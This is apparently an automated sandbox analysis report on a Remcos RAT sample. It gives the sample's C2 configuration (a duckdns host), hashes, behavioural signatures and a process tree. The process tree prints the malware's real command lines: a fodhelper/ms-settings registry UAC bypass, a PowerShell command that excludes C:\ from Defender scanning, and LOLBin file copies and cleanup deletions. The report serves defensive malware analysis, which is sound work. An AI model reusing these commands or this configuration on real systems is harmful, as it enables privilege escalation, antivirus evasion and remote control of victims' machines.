Analysis
-
max time kernel: 149s
max time network: 134s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 25-07-2024 08:07
Static task: static1
Behavioral task: behavioral1
  Sample: MalwareBazaar.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: MalwareBazaar.exe
  Resource: win10v2004-20240709-en
General
-
Target: MalwareBazaar.exe
Size: 1.0MB
MD5: c9849a6295f2527f02fd7b9a0664d401
SHA1: 9db9709ad5446150bff3c3a4d193979753904866
SHA256: 52a6184f61de86b9bfe6abf00bbcf297a308bd91effb754d3bf16fd132384071
SHA512: 0f330d7bc780dbb1b9ef2bc92e018c29523aca29fda9e3f3f785e4c8f6fc06181e0e4c5bb5ad59f7a34409affa606d9d19c4f13981e8097c95778beef6cbd3ea
SSDEEP: 24576:E6Dlm/atGKanKxvdwEHfZTX0u/nJaRj9yin1mV/aJscLc:DDcCZfx+GQRjj1mj
Malware Config
-
Extracted: remcos
RemoteHost:
  127.0.0.1:52121
  officerem.duckdns.org:52121
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-UNX1LL
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures
-
Executes dropped EXE (19 IoCs)
Processes (pid, process):
  2124 ngtepnyT.pif
  1484 alpha.exe
  2676 alpha.exe
  3064 alpha.exe
  2468 alpha.exe
  2840 alpha.exe
  1940 alpha.exe
  2128 xkn.exe
  2336 alpha.exe
  1512 ger.exe
  2844 alpha.exe
  2016 alpha.exe
  2268 alpha.exe
  2228 alpha.exe
  2164 alpha.exe
  1148 alpha.exe
  1404 alpha.exe
  2320 alpha.exe
  672 alpha.exe
-
Loads dropped DLL (15 IoCs)
Processes (pid, process):
  2332 MalwareBazaar.exe
  2332 MalwareBazaar.exe
  320 cmd.exe
  320 cmd.exe
  320 cmd.exe
  320 cmd.exe
  320 cmd.exe
  320 cmd.exe
  1940 alpha.exe
  2128 xkn.exe
  2128 xkn.exe
  2128 xkn.exe
  2336 alpha.exe
  320 cmd.exe
  320 cmd.exe
-
Adds Run key to start application (2 TTPs, 1 IoCs)
Processes (description, ioc, process):
  Set value (str)  \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tynpetgn = "C:\\Users\\Public\\Tynpetgn.url"  MalwareBazaar.exe
-
Suspicious use of SetThreadContext (1 IoCs)
Processes (description, pid, process, target process):
  PID 2332 set thread context of 2124  2332 MalwareBazaar.exe -> ngtepnyT.pif
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery (1 TTPs, 4 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes (description, ioc, process):
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  extrac32.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  SndVol.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MalwareBazaar.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ngtepnyT.pif
-
System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
Processes (pid, process):
  2016 alpha.exe
  1996 PING.EXE
-
Kills process with taskkill (1 IoCs)
Processes (pid, process):
  2092 taskkill.exe
-
Modifies registry class (5 IoCs)
Processes (description, ioc, process):
  Key created  \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings  ger.exe
  Key created  \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\shell  ger.exe
  Key created  \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\shell\open  ger.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""  ger.exe
  Key created  \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\shell\open\command  ger.exe
-
Runs ping.exe (1 TTPs, 1 IoCs)
-
Script User-Agent (1 IoCs)
Uses user-agent string associated with script host/environment.
Processes (description, flow, ioc):
  HTTP User-Agent header  4  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes (pid, process):
  2128 xkn.exe
  2332 MalwareBazaar.exe
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description, pid, process):
  Token: SeDebugPrivilege  2128 xkn.exe
  Token: SeDebugPrivilege  2092 taskkill.exe
-
Suspicious use of FindShellTrayWindow (1 IoCs)
Processes (pid, process):
  3056 SndVol.exe
-
Suspicious use of SendNotifyMessage (2 IoCs)
Processes (pid, process):
  3056 SndVol.exe
  3056 SndVol.exe
-
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description, pid, process -> target process; identical rows collapsed, count in parentheses):
  PID 2332 wrote to memory of 2124  2332 MalwareBazaar.exe -> ngtepnyT.pif  (x6)
  PID 2124 wrote to memory of 320   2124 ngtepnyT.pif -> cmd.exe  (x4)
  PID 320 wrote to memory of 576    320 cmd.exe -> extrac32.exe  (x3)
  PID 320 wrote to memory of 1484   320 cmd.exe -> alpha.exe  (x3)
  PID 320 wrote to memory of 2676   320 cmd.exe -> alpha.exe  (x3)
  PID 320 wrote to memory of 3064   320 cmd.exe -> alpha.exe  (x3)
  PID 3064 wrote to memory of 3052  3064 alpha.exe -> extrac32.exe  (x3)
  PID 320 wrote to memory of 2468   320 cmd.exe -> alpha.exe  (x3)
  PID 2468 wrote to memory of 2424  2468 alpha.exe -> extrac32.exe  (x3)
  PID 320 wrote to memory of 2840   320 cmd.exe -> alpha.exe  (x3)
  PID 2840 wrote to memory of 2880  2840 alpha.exe -> extrac32.exe  (x3)
  PID 320 wrote to memory of 1940   320 cmd.exe -> alpha.exe  (x3)
  PID 1940 wrote to memory of 2128  1940 alpha.exe -> xkn.exe  (x3)
  PID 2128 wrote to memory of 2336  2128 xkn.exe -> alpha.exe  (x3)
  PID 2336 wrote to memory of 1512  2336 alpha.exe -> ger.exe  (x3)
  PID 320 wrote to memory of 2844   320 cmd.exe -> alpha.exe  (x3)
  PID 2844 wrote to memory of 2092  2844 alpha.exe -> taskkill.exe  (x3)
  PID 320 wrote to memory of 2016   320 cmd.exe -> alpha.exe  (x3)
  PID 2016 wrote to memory of 1996  2016 alpha.exe -> PING.EXE  (x3)
  PID 320 wrote to memory of 2268   320 cmd.exe -> alpha.exe  (x3)
Processes
-
Process tree (indentation shows parent/child depth; each entry lists image path, PID, command line and matched signatures):

C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe (PID 2332)
  Command line: "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Users\Public\Libraries\ngtepnyT.pif (PID 2124)
    Command line: C:\Users\Public\Libraries\ngtepnyT.pif
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 320)
      Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A0C2.tmp\A0C3.tmp\A0C4.bat C:\Users\Public\Libraries\ngtepnyT.pif"
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\extrac32.exe (PID 576)
        Command line: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      C:\Users\Public\alpha.exe (PID 1484)
        Command line: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        - Executes dropped EXE
      C:\Users\Public\alpha.exe (PID 2676)
        Command line: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        - Executes dropped EXE
      C:\Users\Public\alpha.exe (PID 3064)
        Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\extrac32.exe (PID 3052)
          Command line: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
      C:\Users\Public\alpha.exe (PID 2468)
        Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\extrac32.exe (PID 2424)
          Command line: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
      C:\Users\Public\alpha.exe (PID 2840)
        Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\extrac32.exe (PID 2880)
          Command line: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
      C:\Users\Public\alpha.exe (PID 1940)
        Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        C:\Users\Public\xkn.exe (PID 2128)
          Command line: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          C:\Users\Public\alpha.exe (PID 2336)
            Command line: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory
            C:\Users\Public\ger.exe (PID 1512)
              Command line: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              - Executes dropped EXE
              - Modifies registry class
      C:\Users\Public\alpha.exe (PID 2844)
        Command line: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe (PID 2092)
          Command line: taskkill /F /IM SystemSettings.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      C:\Users\Public\alpha.exe (PID 2016)
        Command line: C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
        - Executes dropped EXE
        - System Network Configuration Discovery: Internet Connection Discovery
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\PING.EXE (PID 1996)
          Command line: ping 127.0.0.1 -n 2
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
      C:\Users\Public\alpha.exe (PID 2268)
        Command line: C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
        - Executes dropped EXE
      C:\Users\Public\alpha.exe (PID 2228)
        Command line: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
        - Executes dropped EXE
      C:\Users\Public\alpha.exe (PID 2164)
        Command line: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
        - Executes dropped EXE
      C:\Users\Public\alpha.exe (PID 1148)
        Command line: C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
        - Executes dropped EXE
      C:\Users\Public\alpha.exe (PID 1404)
        Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
        - Executes dropped EXE
      C:\Users\Public\alpha.exe (PID 2320)
        Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
        - Executes dropped EXE
      C:\Users\Public\alpha.exe (PID 672)
        Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
        - Executes dropped EXE
  C:\Windows\SysWOW64\extrac32.exe (PID 1476)
    Command line: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\\Users\\Public\\Libraries\\Tynpetgn.PIF
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\SndVol.exe (PID 3056)
    Command line: C:\Windows\System32\SndVol.exe
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
-
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Downloads
-
Filesize
222B
MD5: 5743dbc5062448020c224de468ffbfa5
SHA1: a8c031b97d492add4e9fdc0d509d7958ff267a01
SHA256: 47fa926e8bf438a09ca7db3524682eb690c4412aaceb659a6f35e87d7ba2cd63
SHA512: e6f04751f8e3f6ede874fec9de2bc5cc4885eaa5ea20739f268cbcb02955f299d68d2fe2b1468f587d633088a79eb8992787472b50c256246600d6c6432eb46d
-
Filesize
1KB
MD5: e62f427202d3e5a3ba60ebe78567918c
SHA1: 6ef0cd5ba6c871815fceb27ff095a7931452b334
SHA256: 06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512: e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6
-
Filesize
70KB
MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1: 1723be06719828dda65ad804298d0431f6aff976
SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD5: 4ea6026cf93ec6338144661bf1202cd1
SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
337KB
MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
73KB
MD5: 9d0b3066fe3d1fd345e86bc7bcced9e4
SHA1: e05984a6671fcfecbc465e613d72d42bda35fd90
SHA256: 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512: d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
66KB
MD5: c116d3604ceafe7057d77ff27552c215
SHA1: 452b14432fb5758b46f2897aeccd89f7c82a727d
SHA256: 7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA512: 9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
462KB
MD5: 852d67a27e454bd389fa7f02a8cbe23f
SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d